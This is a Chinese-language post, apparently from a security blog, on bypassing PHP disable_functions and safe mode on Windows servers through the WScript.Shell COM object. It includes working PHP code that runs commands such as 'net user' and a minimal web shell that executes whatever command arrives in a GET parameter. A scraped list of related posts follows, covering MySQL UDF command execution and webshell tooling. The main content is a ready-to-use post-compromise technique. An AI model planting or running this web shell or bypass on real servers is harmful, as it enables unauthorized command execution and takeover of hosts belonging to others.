php利用wsh突破函数禁用执行命令(安全模式同理)
php利用wsh突破函数禁用执行命令(安全模式同理)
很多时候有些windows的服务器是支持wsh组建的,但是却执行不了命令,asp下执行被拒绝,php下执行报错,此时你可以借鉴以下的方法尝试。
php利用wsh突破函数禁用执行命令(安全模式同理)
条件说明:
需要服务器是windows并支持wsh组建.且知道php安装目录
php在IIS环境下利用wsh执行命令是没有asp的权限高的。如果在apache环境下,apache默认都是system或administrator权限。
测试是否可以执行命令的时候,如果回显空白,可以多尝试一些命令,比如set,whoami,等等,因为有时候有些命令被禁用的,比如net类或者ipconfig命令就经常被禁用。
突破代码如下:
<?php
$cmd='net user';
$path = 'C:\\PHP\\php.exe';
$cmd='-r "system(\''.$cmd.'\');" -d disable_functions = ';//重新定义disable_functions函数
$phpwsh=new COM("Wscript.Shell") or die("Create Wscript.Shell Failed!");
$exec=$phpwsh->exec($path.' '.$cmd);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo "${stroutput}\n";
?>
或者:
<?php
$phpwsh=new COM("Wscript.Shell") or die("Create Wscript.Shell Failed!");
$exec=$phpwsh->exec("cmd.exe /c ".$_GET['c']."");
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
php利用wsh突破函数禁用执行命令(安全模式同理)相关推荐
- Linux system函数的执行命令并获取状态
在linux中,可以通过调用system函数执行linux命令,但是如何获取执行命令的结果状态呢,也就是是否执行成功. #include <stdio.h> #include <st ...
- 绕过宝塔禁止的php函数,宝塔disable functions函数全被禁命令执行+加域服务器如何无限制执行命令...
本地搭建实验环境时遇到了不少小问题 实验环境2008 R2 宝塔搭建的IIS discuz3.2X 手动上传shell 冰蝎连接 (ps:有表哥使用冰蝎的时候提示文件存在但是无法获取密钥,解决办法,使 ...
- MySQL利用UDF执行命令
UDF即User-Defined Functions lib_mysqludf_sys 在github的介绍: A UDF library with functions to interact wit ...
- i春秋CTF ssrfme (peal函数中get命令漏洞)命令执行 详细题解+原理 学习过程
前几天刚做一道命令执行的题目累的够呛,这会刷题又碰见一道,看了很多write up都不有不同的地方,而且这道题的环境和其他平台的环境也有点差异,有些wirte up 复现甚至做不出,最后自己独自去思考 ...
- python、中循环功能可通过什么命令实现_python定时执行指定函数的方法 Python如何定时循环执行命令?...
python中如何定时执行某一个函数 = =怎么连接..先调用注册函数 然后调用登录函数就行.顺序执行.至于如果你说注册失败不进行登录的话 直接在注册函数里面处理 注册失败 return def si ...
- python基础之os.system函数执行命令行语句
前言 os.system方法是os模块最基础的方法,其它的方法一般在该方法基础上封装完成. os的system原理 system函数可以将字符串转化成命令在服务器上运行:其原理是每一条system函数 ...
- PHP执行命令的函数有,php的命令执行函数
php 动态执行 函数,PHP学习 你的知识信息已经过时了吗? ,php自动执行函数,php的命令执行函数 PHP 为执行外部命令提供大量函数_历史学_高等教育_教育专区.php基础PHP 为执行外部 ...
- Linux函数返回值判断if,bash函数内判断命令执行结果并返回
bash函数内判断命令执行结果并返回 需求背景 在bash编程中,经常会需要执行对命令的结果判断,如果正确继续执行,如果不正确则返回. function foo() { run_a_cmd if [ ...
- 利用WSH修改注册表
利用WSH修改注册表 大名鼎鼎的WSH听说过吗? 它就是Windows Script Host的缩写形式,WSH是Windows平台的脚本指令,它的功能十分强大,并且它还是利用语法结构简单.易学易用且 ...
最新文章
- Google仍鸡蛋[DP]
- DataFormatString格式化字符串的总结
- ansible 判断和循环
- System.gc()调用 - 适用的场景
- jeecg中excel导出字段判空处理
- 全网最详细 Python如何读取NIFTI格式图像(.nii文件)和 .npy格式文件和pkl标签文件内容
- mysql 5.7.11 x64_mysql 5.7.11 winx64安装配置教程
- LeetCode 60. 第k个排列(python、c++)
- 等价于什么_从来就没有什么等价交换
- 怎么用python统计字数_Python 统计字数的思路详解
- C和C指针小记(五)-指针类型
- 【转】BLE开发的各种坑
- Vegas安装出现问题怎么办?
- malloc和free的常识性问题
- Tortoise SVN安装后右键没有菜单的解决方法
- python3安装cv2 安装opencv 2019发布
- Activity-GalleryView
- 城市数字孪生解决方案
- CRMEB 【Java版】单商户商城系统v1.4.1
- 财经大数据可视化Vdc平台_大数据时代-可视化数据分析平台必不可少